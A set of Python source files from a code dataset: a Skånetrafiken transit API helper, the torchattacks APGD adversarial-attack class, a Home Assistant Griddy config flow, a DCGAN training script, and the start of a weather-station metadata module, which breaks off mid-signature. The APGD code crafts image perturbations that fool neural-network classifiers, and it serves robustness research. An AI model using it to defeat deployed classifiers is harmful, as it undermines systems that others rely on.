latitude: The latitude part of the users position\n :return: list of stations, consisting of names and id:s\n :rtype: list\n \"\"\"\n \n tree = get_xml_tree(\"http://www.labs.skanetrafiken.se/v2.2/neareststation.asp?\",\n {\"x\": latitude, \"y\": longitude, \"Radius\":500})\n result = []\n\n for stop_area in tree.iter('{http://www.etis.fskab.se/v1.0/ETISws}NearestStopArea'):\n name = stop_area.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\").text\n id = stop_area.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Id\").text\n result.append([name, id])\n\n return result\n\ndef get_xml_tree(url, params):\n \"\"\" Util-function for making a request through an url, with the given parameters.\n \n :param str url: The longitude part of the users position\n :param dict params: The latitude part of the users position\n :return: An xml-tree-object representing the response from the request.\n :rtype: xml.etree.ElementTree.Element\n \"\"\"\n response = requests.get(url, params=params)\n tree = ET.fromstring(response.content)\n return tree\n\ndef minutes_from_now(timestamp):\n \"\"\" Util-function for calculating the number of minutes from now until the given timestamp\n \n :param str timestamp: represents a given timestamp. formatted as example: 2019-01-15T18:40:00\n :return: a whole number representing the number of minutes from now until the time of the given timestamp\n :rtype: int\n \"\"\"\n \n now = datetime.now()\n\n l = timestamp.split(\"T\")\n date = l[0]\n time = l[1]\n\n dl = date.split(\"-\")\n year = int(dl[0])\n month = int(dl[1])\n day = int(dl[2])\n\n tl = time.split(\":\")\n hour = int(tl[0])\n min = int(tl[1])\n\n datetime_stamp = datetime(year, month, day, hour, min)\n minutes_diff = (datetime_stamp - now).total_seconds() / 60.0\n return int(round(minutes_diff))\n\nif __name__ == \"__main__\":\n print(get_next_trips(13.1070605, 55.6523299, 80000))\n # print(find_station_by_name(\"Malm c\"))\n # print(get_xml_tree('http://www.labs.skanetrafiken.se/v2.2/querystation.asp?',\n # {'inpPointFr': \"malmö\"}))\n # print(minutes_from_now(\"2019-01-16T18:40:00\"))","sub_path":"app/skanetrafiken.py","file_name":"skanetrafiken.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"391661187","text":"import time\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom ..attack import Attack\n\n\nclass APGD(Attack):\n r\"\"\"\n APGD in the paper 'Reliable evaluation of adversarial robustness with an ensemble of diverse parameter-free attacks'\n [https://arxiv.org/abs/2003.01690]\n [https://github.com/fra31/auto-attack]\n\n Distance Measure : Linf, L2\n\n Arguments:\n model (nn.Module): model to attack.\n norm (str): Lp-norm of the attack. ['Linf', 'L2'] (Default: 'Linf')\n eps (float): maximum perturbation. (Default: 8/255)\n steps (int): number of steps. (Default: 10)\n n_restarts (int): number of random restarts. (Default: 1)\n seed (int): random seed for the starting point. (Default: 0)\n loss (str): loss function optimized. ['ce', 'dlr'] (Default: 'ce')\n eot_iter (int): number of iteration for EOT. (Default: 1)\n rho (float): parameter for step-size update (Default: 0.75)\n verbose (bool): print progress. (Default: False)\n\n Shape:\n - images: :math:`(N, C, H, W)` where `N = number of batches`, `C = number of channels`, `H = height` and `W = width`. It must have a range [0, 1].\n - labels: :math:`(N)` where each value :math:`y_i` is :math:`0 \\leq y_i \\leq` `number of labels`.\n - output: :math:`(N, C, H, W)`.\n\n Examples::\n >>> attack = torchattacks.APGD(model, norm='Linf', eps=8/255, steps=10, n_restarts=1, seed=0, loss='ce', eot_iter=1, rho=.75, verbose=False)\n >>> adv_images = attack(images, labels)\n\n \"\"\"\n\n def __init__(self, model, device=None, norm='Linf', eps=8/255, steps=10, n_restarts=1, seed=0, loss='ce', eot_iter=1, rho=.75, verbose=False):\n super().__init__('APGD', model, device)\n self.eps = eps\n self.steps = steps\n self.norm = norm\n self.n_restarts = n_restarts\n self.seed = seed\n self.loss = loss\n self.eot_iter = eot_iter\n self.thr_decr = rho\n self.verbose = verbose\n self.supported_mode = ['default']\n\n def forward(self, images, labels):\n r\"\"\"\n Overridden.\n \"\"\"\n\n images = images.clone().detach().to(self.device)\n labels = labels.clone().detach().to(self.device)\n _, adv_images = self.perturb(images, labels, cheap=True)\n\n return adv_images\n\n def check_oscillation(self, x, j, k, y5, k3=0.75):\n t = np.zeros(x.shape[1])\n for counter5 in range(k):\n t += x[j - counter5] > x[j - counter5 - 1]\n\n return t <= k*k3*np.ones(t.shape)\n\n def check_shape(self, x):\n return x if len(x.shape) > 0 else np.expand_dims(x, 0)\n\n def dlr_loss(self, x, y):\n x_sorted, ind_sorted = x.sort(dim=1)\n ind = (ind_sorted[:, -1] == y).float()\n\n return -(x[np.arange(x.shape[0]), y] - x_sorted[:, -2] * ind - x_sorted[:, -1] * (1. - ind)) / (x_sorted[:, -1] - x_sorted[:, -3] + 1e-12)\n\n def attack_single_run(self, x_in, y_in):\n x = x_in.clone() if len(x_in.shape) == 4 else x_in.clone().unsqueeze(0)\n y = y_in.clone() if len(y_in.shape) == 1 else y_in.clone().unsqueeze(0)\n\n self.steps_2, self.steps_min, self.size_decr = max(int(\n 0.22 * self.steps), 1), max(int(0.06 * self.steps), 1), max(int(0.03 * self.steps), 1)\n if self.verbose:\n print('parameters: ', self.steps, self.steps_2,\n self.steps_min, self.size_decr)\n\n if self.norm == 'Linf':\n t = 2 * torch.rand(x.shape).to(self.device).detach() - 1\n x_adv = x.detach() + self.eps * torch.ones([x.shape[0], 1, 1, 1]).to(self.device).detach() * t / (t.reshape([t.shape[0], -1]).abs().max(dim=1, keepdim=True)[0].reshape([-1, 1, 1, 1])) # nopep8\n elif self.norm == 'L2':\n t = torch.randn(x.shape).to(self.device).detach()\n x_adv = x.detach() + self.eps * torch.ones([x.shape[0], 1, 1, 1]).to(self.device).detach() * t / ((t ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) # nopep8\n x_adv = x_adv.clamp(0., 1.)\n x_best = x_adv.clone()\n x_best_adv = x_adv.clone()\n loss_steps = torch.zeros([self.steps, x.shape[0]])\n loss_best_steps = torch.zeros([self.steps + 1, x.shape[0]])\n acc_steps = torch.zeros_like(loss_best_steps)\n\n if self.loss == 'ce':\n criterion_indiv = nn.CrossEntropyLoss(reduction='none')\n elif self.loss == 'dlr':\n criterion_indiv = self.dlr_loss\n else:\n raise ValueError('unknown loss')\n\n x_adv.requires_grad_()\n grad = torch.zeros_like(x)\n for _ in range(self.eot_iter):\n with torch.enable_grad():\n # 1 forward pass (eot_iter = 1)\n logits = self.get_logits(x_adv)\n loss_indiv = criterion_indiv(logits, y)\n loss = loss_indiv.sum()\n\n # 1 backward pass (eot_iter = 1)\n grad += torch.autograd.grad(loss, [x_adv])[0].detach()\n\n grad /= float(self.eot_iter)\n grad_best = grad.clone()\n\n acc = logits.detach().max(1)[1] == y\n acc_steps[0] = acc + 0\n loss_best = loss_indiv.detach().clone()\n\n step_size = self.eps * torch.ones([x.shape[0], 1, 1, 1]).to(self.device).detach() * torch.Tensor([2.0]).to(self.device).detach().reshape([1, 1, 1, 1]) # nopep8\n x_adv_old = x_adv.clone()\n counter = 0\n k = self.steps_2 + 0\n u = np.arange(x.shape[0])\n counter3 = 0\n\n loss_best_last_check = loss_best.clone()\n reduced_last_check = np.zeros(\n loss_best.shape) == np.zeros(loss_best.shape)\n\n # n_reduced = 0\n for i in range(self.steps):\n # gradient step\n with torch.no_grad():\n x_adv = x_adv.detach()\n grad2 = x_adv - x_adv_old\n x_adv_old = x_adv.clone()\n\n a = 0.75 if i > 0 else 1.0\n\n if self.norm == 'Linf':\n x_adv_1 = x_adv + step_size * torch.sign(grad)\n x_adv_1 = torch.clamp(\n torch.min(torch.max(x_adv_1, x - self.eps), x + self.eps), 0.0, 1.0)\n x_adv_1 = torch.clamp(torch.min(torch.max(\n x_adv + (x_adv_1 - x_adv) * a + grad2 * (1 - a), x - self.eps), x + self.eps), 0.0, 1.0)\n\n elif self.norm == 'L2':\n x_adv_1 = x_adv + step_size * grad / ((grad ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) # nopep8\n x_adv_1 = torch.clamp(x + (x_adv_1 - x) / (((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) * torch.min(self.eps * torch.ones(x.shape).to(self.device).detach(), ((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt()), 0.0, 1.0) # nopep8\n x_adv_1 = x_adv + (x_adv_1 - x_adv) * a + grad2 * (1 - a)\n x_adv_1 = torch.clamp(x + (x_adv_1 - x) / (((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) * torch.min(self.eps * torch.ones(x.shape).to(self.device).detach(), ((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12), 0.0, 1.0) # nopep8\n\n x_adv = x_adv_1 + 0.\n\n # get gradient\n x_adv.requires_grad_()\n grad = torch.zeros_like(x)\n for _ in range(self.eot_iter):\n with torch.enable_grad():\n # 1 forward pass (eot_iter = 1)\n logits = self.get_logits(x_adv)\n loss_indiv = criterion_indiv(logits, y)\n loss = loss_indiv.sum()\n\n # 1 backward pass (eot_iter = 1)\n grad += torch.autograd.grad(loss, [x_adv])[0].detach()\n\n grad /= float(self.eot_iter)\n\n pred = logits.detach().max(1)[1] == y\n acc = torch.min(acc, pred)\n acc_steps[i + 1] = acc + 0\n x_best_adv[(pred == 0).nonzero().squeeze()] = x_adv[(pred == 0).nonzero().squeeze()] + 0. # nopep8\n if self.verbose:\n print('iteration: {} - Best loss: {:.6f}'.format(i, loss_best.sum()))\n\n # check step size\n with torch.no_grad():\n y1 = loss_indiv.detach().clone()\n loss_steps[i] = y1.cpu() + 0\n ind = (y1 > loss_best).nonzero().squeeze()\n x_best[ind] = x_adv[ind].clone()\n grad_best[ind] = grad[ind].clone()\n loss_best[ind] = y1[ind] + 0\n loss_best_steps[i + 1] = loss_best + 0\n\n counter3 += 1\n\n if counter3 == k:\n fl_oscillation = self.check_oscillation(loss_steps.detach().cpu(\n ).numpy(), i, k, loss_best.detach().cpu().numpy(), k3=self.thr_decr)\n fl_reduce_no_impr = (~reduced_last_check) * (loss_best_last_check.cpu().numpy() >= loss_best.cpu().numpy()) # nopep8\n fl_oscillation = ~(~fl_oscillation * ~fl_reduce_no_impr)\n reduced_last_check = np.copy(fl_oscillation)\n loss_best_last_check = loss_best.clone()\n\n if np.sum(fl_oscillation) > 0:\n step_size[u[fl_oscillation]] /= 2.0\n n_reduced = fl_oscillation.astype(float).sum()\n\n fl_oscillation = np.where(fl_oscillation)\n\n x_adv[fl_oscillation] = x_best[fl_oscillation].clone()\n grad[fl_oscillation] = grad_best[fl_oscillation].clone()\n\n counter3 = 0\n k = np.maximum(k - self.size_decr, self.steps_min)\n\n return x_best, acc, loss_best, x_best_adv\n\n def perturb(self, x_in, y_in, best_loss=False, cheap=True):\n assert self.norm in ['Linf', 'L2']\n x = x_in.clone() if len(x_in.shape) == 4 else x_in.clone().unsqueeze(0)\n y = y_in.clone() if len(y_in.shape) == 1 else y_in.clone().unsqueeze(0)\n\n adv = x.clone()\n acc = self.get_logits(x).max(1)[1] == y\n # loss = -1e10 * torch.ones_like(acc).float()\n if self.verbose:\n print('-------------------------- running {}-attack with epsilon {:.4f} --------------------------'.format(self.norm, self.eps))\n print('initial accuracy: {:.2%}'.format(acc.float().mean()))\n startt = time.time()\n\n if not best_loss:\n torch.random.manual_seed(self.seed)\n torch.cuda.random.manual_seed(self.seed)\n\n if not cheap:\n raise ValueError('not implemented yet')\n\n else:\n for counter in range(self.n_restarts):\n ind_to_fool = acc.nonzero().squeeze()\n if len(ind_to_fool.shape) == 0:\n ind_to_fool = ind_to_fool.unsqueeze(0)\n if ind_to_fool.numel() != 0:\n x_to_fool, y_to_fool = x[ind_to_fool].clone(), y[ind_to_fool].clone() # nopep8\n best_curr, acc_curr, loss_curr, adv_curr = self.attack_single_run(x_to_fool, y_to_fool) # nopep8\n ind_curr = (acc_curr == 0).nonzero().squeeze()\n #\n acc[ind_to_fool[ind_curr]] = 0\n adv[ind_to_fool[ind_curr]] = adv_curr[ind_curr].clone()\n if self.verbose:\n print('restart {} - robust accuracy: {:.2%} - cum. time: {:.1f} s'.format(\n counter, acc.float().mean(), time.time() - startt))\n\n return acc, adv\n\n else:\n adv_best = x.detach().clone()\n loss_best = torch.ones([x.shape[0]]).to(self.device) * (-float('inf')) # nopep8\n for counter in range(self.n_restarts):\n best_curr, _, loss_curr, _ = self.attack_single_run(x, y)\n ind_curr = (loss_curr > loss_best).nonzero().squeeze()\n adv_best[ind_curr] = best_curr[ind_curr] + 0.\n loss_best[ind_curr] = loss_curr[ind_curr] + 0.\n\n if self.verbose:\n print('restart {} - loss: {:.5f}'.format(counter, loss_best.sum()))\n\n return loss_best, adv_best\n","sub_path":"torchattacks/attacks/apgd.py","file_name":"apgd.py","file_ext":"py","file_size_in_byte":12200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"398026527","text":"\"\"\"Config flow for Griddy Power integration.\"\"\"\nimport asyncio\nimport logging\n\nfrom aiohttp import ClientError\nfrom griddypower.async_api import LOAD_ZONES, AsyncGriddy\nimport voluptuous as vol\n\nfrom homeassistant import config_entries, core, exceptions\nfrom homeassistant.helpers import aiohttp_client\n\nfrom .const import CONF_LOADZONE\nfrom .const import DOMAIN # pylint:disable=unused-import\n\n_LOGGER = logging.getLogger(__name__)\n\nDATA_SCHEMA = vol.Schema({vol.Required(CONF_LOADZONE): vol.In(LOAD_ZONES)})\n\n\nasync def validate_input(hass: core.HomeAssistant, data):\n \"\"\"Validate the user input allows us to connect.\n\n Data has the keys from DATA_SCHEMA with values provided by the user.\n \"\"\"\n client_session = aiohttp_client.async_get_clientsession(hass)\n\n try:\n await AsyncGriddy(\n client_session, settlement_point=data[CONF_LOADZONE]\n ).async_getnow()\n except (asyncio.TimeoutError, ClientError) as err:\n raise CannotConnect from err\n\n # Return info that you want to store in the config entry.\n return {\"title\": f\"Load Zone {data[CONF_LOADZONE]}\"}\n\n\nclass ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Handle a config flow for Griddy Power.\"\"\"\n\n VERSION = 1\n CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL\n\n async def async_step_user(self, user_input=None):\n \"\"\"Handle the initial step.\"\"\"\n errors = {}\n info = None\n if user_input is not None:\n try:\n info = await validate_input(self.hass, user_input)\n except CannotConnect:\n errors[\"base\"] = \"cannot_connect\"\n except Exception: # pylint: disable=broad-except\n _LOGGER.exception(\"Unexpected exception\")\n errors[\"base\"] = \"unknown\"\n\n if \"base\" not in errors:\n await self.async_set_unique_id(user_input[CONF_LOADZONE])\n self._abort_if_unique_id_configured()\n return self.async_create_entry(title=info[\"title\"], data=user_input)\n\n return self.async_show_form(\n step_id=\"user\", data_schema=DATA_SCHEMA, errors=errors\n )\n\n async def async_step_import(self, user_input):\n \"\"\"Handle import.\"\"\"\n await self.async_set_unique_id(user_input[CONF_LOADZONE])\n self._abort_if_unique_id_configured()\n\n return await self.async_step_user(user_input)\n\n\nclass CannotConnect(exceptions.HomeAssistantError):\n \"\"\"Error to indicate we cannot connect.\"\"\"\n","sub_path":"homeassistant/components/griddy/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69329526","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\n\n# used to load and transform popular CV datasets\nimport torchvision\nimport torchvision.transforms as transforms \n\n#plotting the graphs\nimport matplotlib.pyplot as plt\nfrom textwrap import wrap\n\n\n# to save and load numpy arrays\nfrom numpy import save as np_save\nimport numpy as np\n\n\n#import IPython.display\n\n# for MMD calculation\nfrom sklearn.metrics import pairwise_kernels, pairwise_distances\n\n# import datasets\nimport sys\nsys.path.append('../')\nfrom Datasets.loadDataset import loadDataset, getHelperClass, getEpochs, getChannels, getClasses\nreload(sys.modules[loadDataset.__module__])\n\n# import configuration\nimport config\nreload(config)\nfrom config import *\n\n\nfrom model_28 import Generator, Discriminator\nnumGenFilter=64\nnumDiscFilter=32\nimageSize = 28\n\n\ndef MMD2u(K, m, n):\n \"\"\"The MMD^2_u unbiased statistic.\n \"\"\"\n\n # take the first m samples in RKHS as Kx and rest as Ky\n\n Kx = K[:m, :m]\n Ky = K[m:, m:]\n Kxy = K[:m, m:]\n\n # substract the diagonal part because according to representation\n return 1.0 / (m * (m - 1.0)) * (Kx.sum() - Kx.diagonal().sum()) + \\\n 1.0 / (n * (n - 1.0)) * (Ky.sum() - Ky.diagonal().sum()) - \\\n 2.0 / (m * n) * Kxy.sum()\n \ndef kernelTwoSampleTest(X, Y, kernel_function='rbf', iterations=10000,\n verbose=False, **kwargs):\n \"\"\"Compute MMD^2_u, its null distribution and the p-value of the\n kernel two-sample test.\n\n Note that extra parameters captured by **kwargs will be passed to\n pairwise_kernels() as kernel parameters. E.g. if\n kernel_two_sample_test(..., kernel_function='rbf', gamma=0.1),\n then this will result in getting the kernel through\n kernel_function(metric='rbf', gamma=0.1).\n \"\"\"\n \n m = len(X)\n n = len(Y)\n \n X = X.numpy()\n X = X.reshape(X.shape[0],-1)\n Y = Y.numpy()\n Y = Y.reshape(Y.shape[0],-1)\n \n XY = np.vstack([X, Y])\n\n # calculate the kernel matrix given elements of both domains\n K = pairwise_kernels(XY, metric=kernel_function, **kwargs)\n\n mmd2u = MMD2u(K, m, n)\n if verbose:\n print(\"MMD^2_u = %s\" % mmd2u)\n print(\"Computing the null distribution.\")\n\n return mmd2u \n\n# first helper class and then primary class\n\ndef train(primaryFileName, helperFileName, primaryTrainLoader, helperTrainLoader, primaryInstances, numOutputChannels=1, learningRate = 0.0002, optimBetas=(0.5, 0.999), epochs = 5):\n '''\n Training for Deep Convolutional Generative Adversatial Network\n '''\n \n # define the model\n G = Generator(numInputChannels, \n numGenFilter,\n numOutputChannels)\n D = Discriminator(numOutputChannels, \n numDiscFilter)\n lossFunction = nn.BCELoss()\n genOptimiser = optim.Adam(G.parameters(),\n lr=learningRate,\n betas = optimBetas)\n disOptimiser = optim.Adam(D.parameters(),\n lr=learningRate,\n betas = optimBetas)\n discRealInput = torch.FloatTensor(batchSize,\n numOutputChannels,\n imageSize,\n imageSize)\n discFakeInput = torch.FloatTensor(batchSize,\n numInputChannels,\n 1,\n 1)\n fixedNoise = torch.FloatTensor(25,\n numInputChannels,\n 1,\n 1)\n fixedNoise.normal_(0,1)\n\n discRealLabel = torch.FloatTensor(batchSize)\n discFakeLabel = torch.FloatTensor(batchSize)\n discRealLabel.fill_(1)\n discFakeLabel.fill_(0)\n \n # for processing on a GPU\n if cuda:\n G = G.cuda()\n D = D.cuda()\n\n lossFunction = lossFunction.cuda()\n\n discRealInput = discRealInput.cuda()\n discFakeInput = discFakeInput.cuda()\n\n discRealLabel = discRealLabel.cuda()\n discFakeLabel = discFakeLabel.cuda()\n\n fixedNoise = fixedNoise.cuda()\n\n fixedNoiseVariable = Variable(fixedNoise)\n \n # assume that helper primaryInstances are always more than primary primaryInstances\n # define primary Epochs and helper Epochs\n primaryEpochs = epochs\n helperEpochs = 10\n\n # for processing on a GPU\n if cuda:\n\n discRealInput = discRealInput.cuda()\n discFakeInput = discFakeInput.cuda()\n\n discRealLabel = discRealLabel.cuda()\n discFakeLabel = discFakeLabel.cuda()\n \n \n print (\"Starting training with helper class.\")\n plt.figure()\n\n # training with helper class\n for epoch in range(helperEpochs):\n for i, primaryData in enumerate(primaryTrainLoader, 0):\n for j, helperData in enumerate(helperTrainLoader, 0):\n \n #print ('Epoch : {} Primary Class Batch : {}. Helper Class Batch : {}.'.format(epoch+1,i+1,j+1))\n \n primaryDataInstance, primaryDataLabel = primaryData\n helperDataInstance, helperDataLabel = helperData\n \n \n # calculate MMD between two batches of data\n mmd = (1-kernelTwoSampleTest(primaryDataInstance, helperDataInstance))\n mmd = torch.from_numpy(np.asarray([mmd]))\n mmdVariable = Variable(mmd.float().cuda())\n \n # weight given to the term \n lambdaMMD = 1.0\n lambdaMMD = torch.from_numpy(np.asarray([lambdaMMD]))\n lambdaMMDVariable = Variable(lambdaMMD.float().cuda())\n \n D.zero_grad()\n \n # train GAN using helper data instance\n if cuda:\n helperDataInstance = helperDataInstance.cuda()\n\n discRealInput.copy_(helperDataInstance) \n discRealInputVariable = Variable(discRealInput)\n \n # should we treat this as 1 ??\n discRealLabelVariable = Variable(discRealLabel)\n discRealOutput = D(discRealInputVariable)\n lossRealDisc = lambdaMMDVariable*mmdVariable*lossFunction(discRealOutput,\n discRealLabelVariable)\n \n \n lossRealDisc.backward()\n\n # train discriminator on fake data\n discFakeInput.normal_(0,1)\n discFakeInputVariable = Variable(discFakeInput)\n discFakeInputGen = G(discFakeInputVariable)\n discFakeLabelVariable = Variable(discFakeLabel)\n\n discFakeOutput = D(discFakeInputGen.detach())\n lossFakeDisc = lossFunction(discFakeOutput,\n discFakeLabelVariable)\n lossFakeDisc.backward()\n disOptimiser.step()\n\n # train generator based on discriminator\n # for every epoch the gradients are reset to 0\n # the discriminator should start to confuse fake primaryInstances\n # with true primaryInstances\n\n G.zero_grad()\n\n genInputVariable = discFakeInputGen\n genOutputDisc = D(genInputVariable)\n\n lossGen = lossFunction(genOutputDisc,\n discRealLabelVariable)\n\n lossGen.backward()\n genOptimiser.step()\n \n # for every epoch show the image\n if (i==0) and epoch==(helperEpochs-1):\n\n #print ('Completed processing '+str(primaryInstances)+'for'+str(epoch)+'epochs.')\n\n # name for model and plot file\n folder, primaryClass, _ = primaryFileName.split('_')\n _, helperClass, helperInstances = helperFileName.split('_')\n \n fileName = folder + '_' + str(primaryClass) + '_' + str(helperClass) + '_' + \\\n str(primaryInstances) + '_' + str(helperInstances)\n \n # generate samples from trained generator\n genImage = G(fixedNoiseVariable)\n genImage = genImage.data\n genImage = genImage.cpu()\n genImage = torchvision.utils.make_grid(genImage, nrow=5)\n \n genImage = genImage/2 + 0.5\n genImage = genImage.permute(1,2,0)\n genImage = genImage.numpy()\n \n #print genImage.shape\n # plot the figure of generated samples and save\n fig = plt.figure()\n plt.imshow(genImage, cmap='gray')\n plt.axis('off')\n \n if primaryInstances < batchSize:\n discRealInput = torch.FloatTensor(primaryInstances,\n numOutputChannels,\n imageSize,\n imageSize)\n # why only one as width and height ? Passing through generator.\n discFakeInput = torch.FloatTensor(primaryInstances,\n numInputChannels,\n 1,\n 1)\n discRealLabel = torch.FloatTensor(primaryInstances)\n discFakeLabel = torch.FloatTensor(primaryInstances)\n discRealLabel.fill_(1)\n discFakeLabel.fill_(0)\n \n if cuda:\n\n discRealInput = discRealInput.cuda()\n discFakeInput = discFakeInput.cuda()\n\n discRealLabel = discRealLabel.cuda()\n discFakeLabel = discFakeLabel.cuda() \n \n print (\"Ending training with helper class.\")\n print (\"Starting training with primary class.\")\n \n # training with primary class\n for epoch in range(primaryEpochs):\n for i, data in enumerate(primaryTrainLoader, 0):\n \n #print ('Epoch : {} Primary Class Batch : {}.'.format(epoch+1,i+1))\n \n if i>10000:\n print (\"Done 2000 Iterations\")\n break\n\n # train discriminator on real data\n D.zero_grad()\n dataInstance, dataLabel = data\n\n if cuda:\n dataInstance = dataInstance.cuda()\n \n discRealInput.copy_(dataInstance)\n discRealInputVariable = Variable(discRealInput)\n discRealLabelVariable = Variable(discRealLabel)\n\n discRealOutput = D(discRealInputVariable)\n lossRealDisc = lossFunction(discRealOutput,\n discRealLabelVariable)\n \n lossRealDisc.backward()\n\n # train discriminator on fake data\n discFakeInput.normal_(0,1)\n discFakeInputVariable = Variable(discFakeInput)\n discFakeInputGen = G(discFakeInputVariable)\n\n discFakeLabelVariable = Variable(discFakeLabel)\n\n discFakeOutput = D(discFakeInputGen.detach())\n lossFakeDisc = lossFunction(discFakeOutput,\n discFakeLabelVariable)\n lossFakeDisc.backward()\n\n disOptimiser.step()\n\n # train generator based on discriminator\n # for every epoch the gradients are reset to 0\n # the discriminator should start to confuse fake primaryInstances\n # with true primaryInstances\n \n G.zero_grad()\n\n genInputVariable = discFakeInputGen\n genOutputDisc = D(genInputVariable)\n\n lossGen = lossFunction(genOutputDisc,\n discRealLabelVariable)\n\n lossGen.backward()\n genOptimiser.step()\n \n if (i==0) and epoch==(primaryEpochs-1) :\n\n primaryDataSet, primaryClass, primarInstances = primaryFileName.split('_')\n helperDataSet, helperClass, helperInstances = helperFileName.split('_')\n \n fileName = primaryDataSet + '_' + helperDataSet + '_' + str(primaryClass) + '_' + str(helperClass) + '_' + \\\n str(primaryInstances) + '_' + str(helperInstances)\n \n modelFileName = resultDir+'models/crossDataSetMMD'+'/'+primaryDataSet+'/'+fileName+'_'+str(epoch)+'.pt'\n plotFileName = resultDir+'plots/crossDataSetMMD'+'/'+primaryDataSet+'/'+fileName+'_'+str(epoch)+'.png'\n\n # save the model parameters in a file\n torch.save(G.state_dict(), modelFileName)\n\n # generate samples from trained generator\n genImage = G(fixedNoiseVariable)\n genImage = genImage.data\n genImage = genImage.cpu()\n genImage = torchvision.utils.make_grid(genImage, nrow=5)\n \n genImage = genImage/2 + 0.5\n genImage = genImage.permute(1,2,0)\n genImage = genImage.numpy()\n\n # plot the figure of generated samples and save\n fig = plt.figure()\n \n plt.imshow(genImage, cmap='gray')\n plt.axis('off')\n\n txt = 'Epoch: '+ str(epoch)\n fig.text(.45,.05,txt)\n if showImage==1:\n plt.show()\n '''\n IPython.display.clear_output(wait=True)\n IPython.display.display(plt.gcf())\n '''\n plt.savefig(plotFileName, bbox_inches='tight')\n plt.close('all')\n\n print (\"Done trining with primary class primaryInstances.\")\n\ndef trainSamples( primaryDataSet, helperDataSet, primaryClasses, primaryInstances, helperInstances):\n \n for cls in primaryClasses:\n for instance in primaryInstances:\n for helperInstance in helperInstances:\n\n # if the number of primary instances are larger than the number of helper\n # instances, no need to calculate MMD\n if instance > helperInstance:\n continue\n \n # the primary class is same as helper class in this case\n helperClass = cls\n\n print ('Primary Class: {} Helper Class: {} Primary Instances: {} Helper Instance {}'.\n format(cls,helperClass,instance,helperInstance))\n\n primaryFileName = primaryDataSet+'_'+str(cls)+'_'+str(instance)\n helperFileName = helperDataSet+'_'+str(helperClass)+'_'+str(helperInstance)\n \n \n x = loadDataset(primaryDataSet, cls, instance)\n y = loadDataset(helperDataSet, helperClass, helperInstance)\n \n \n primaryTrainLoader=torch.utils.data.DataLoader(x,\n batch_size=batchSize, \n shuffle=True,\n num_workers=4,\n drop_last = False)\n helperTrainLoader=torch.utils.data.DataLoader(y,\n batch_size=batchSize, \n shuffle=True,\n num_workers=4,\n drop_last=True)\n numOutputChannels = getChannels(primaryDataSet)\n epochs = getEpochs(primaryDataSet, instance)\n\n train(primaryFileName, helperFileName, \n primaryTrainLoader, helperTrainLoader, \n instance, numOutputChannels, \n epochs=epochs) \n\n\nif __name__=='__main__':\n \n # primary and helper dataset are one here\n primaryDataSet = 'MNIST'\n helperDataSet = 'SVHN-BW'\n primaryClasses = [1,2,3,4,5,6,7,8,9]\n primaryInstances = [100,500,1000]\n helperInstances = [1000,5000]\n trainSamples(primaryDataSet, helperDataSet, primaryClasses, primaryInstances, helperInstances)","sub_path":"DCGAN/DCGAN_MMD_CD_train.py","file_name":"DCGAN_MMD_CD_train.py","file_ext":"py","file_size_in_byte":16500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646481391","text":"import logging\nfrom datetime import datetime\nfrom typing import Union, Optional, Tuple\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial.ckdtree import cKDTree\n\nfrom wetterdienst import Parameter, TimeResolution, PeriodType\nfrom wetterdienst.dwd.observations.fileindex import (\n create_file_index_for_climate_observations,\n)\nfrom wetterdienst.dwd.observations.metaindex import (\n create_meta_index_for_climate_observations,\n)\nfrom wetterdienst.dwd.metadata.column_names import DWDMetaColumns\nfrom wetterdienst.exceptions import InvalidParameterCombination\nfrom wetterdienst.dwd.util import (\n check_parameters,\n parse_enumeration_from_template,\n parse_datetime,\n)\nfrom wetterdienst.util.geo import Coordinates\n\nKM_EARTH_RADIUS = 6371\n\nlogger = logging.getLogger(__name__)\n\n\ndef metadata_for_climate_observations(\n parameter: Union[Parameter, str],\n time_resolution: Union[TimeResolution, str],\n period_type: Union[PeriodType, str],\n) -> pd.DataFrame:\n \"\"\"\n A main function to retrieve metadata for a set of parameters that creates a\n corresponding csv.\n STATE information is added to metadata for cases where there's no such named\n column (e.g. STATE) in the pandas.DataFrame.\n For this purpose we use daily precipitation data. That has two reasons:\n\n - daily precipitation data has a STATE information combined with a city\n - daily precipitation data is the most common data served by the DWD\n\n :param parameter: Observation measure\n :param time_resolution: Frequency/granularity of measurement interval\n :param period_type: Recent or historical files\n\n :return: List of stations for selected parameters\n \"\"\"\n\n parameter = parse_enumeration_from_template(parameter, Parameter)\n time_resolution = parse_enumeration_from_template(time_resolution, TimeResolution)\n period_type = parse_enumeration_from_template(period_type, PeriodType)\n\n meta_index = create_meta_index_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n meta_index[DWDMetaColumns.HAS_FILE.value] = False\n\n file_index = create_file_index_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n meta_index.loc[\n meta_index.loc[:, DWDMetaColumns.STATION_ID.value].isin(\n file_index[DWDMetaColumns.STATION_ID.value]\n ),\n DWDMetaColumns.HAS_FILE.value,\n ] = True\n\n return meta_index\n\n\ndef get_nearby_stations_by_number(\n latitude: float,\n longitude: float,\n num_stations_nearby: int,\n parameter: Union[Parameter, str],\n time_resolution: Union[TimeResolution, str],\n period_type: Union[PeriodType, str],\n minimal_available_date: 